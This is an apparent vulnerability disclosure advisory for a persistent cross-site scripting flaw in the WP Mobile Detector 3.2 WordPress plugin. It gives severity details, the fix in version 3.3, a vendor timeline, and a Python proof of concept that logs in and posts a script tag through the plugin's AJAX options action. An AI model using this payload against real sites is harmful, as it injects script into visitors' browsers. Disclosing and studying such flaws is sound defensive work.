WP Mobile Detector 3.2, Persistent XSS
The WP Mobile Detector plugin exposes the AJAX action ‘websitez_options’ to all registered users on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values will result in a Persistent XSS attack on Mobile visitors.
Homepage
https://wordpress.org/plugins/wp-mobile-detector/
CVSS Score
4
CSSS Vector
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 3.3
Proof of Concept
The below PoC will result in an alert being triggered for all mobile users of the site. A valid theme must be provided in the request.
import requests
s = requests.session()
target = 'http://localhost'
url = '%s/wp-login.php'%target
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
url = '%s/wp-admin/admin-ajax.php'%target
payload = {
"action":"websitez_options",
"general[selected_mobile_theme]":"wz-mobile",
"general[mobile_title]":"</title><script>alert(1)</script><title>"
}
r = s.post(url, data=payload)Timeline
- 2015-05-13: Discovered
- 2015-05-13: Vendor notified
- 2015-05-13: Vendor responded
- 2015-06-09: Fix shown – pending release by vendor this week
- 2015-06-17: Update requests from vendor, as no release made last week
- 2015-06-18: Version 3.3 released – issue resolved
- 2015-06-25: Advisory released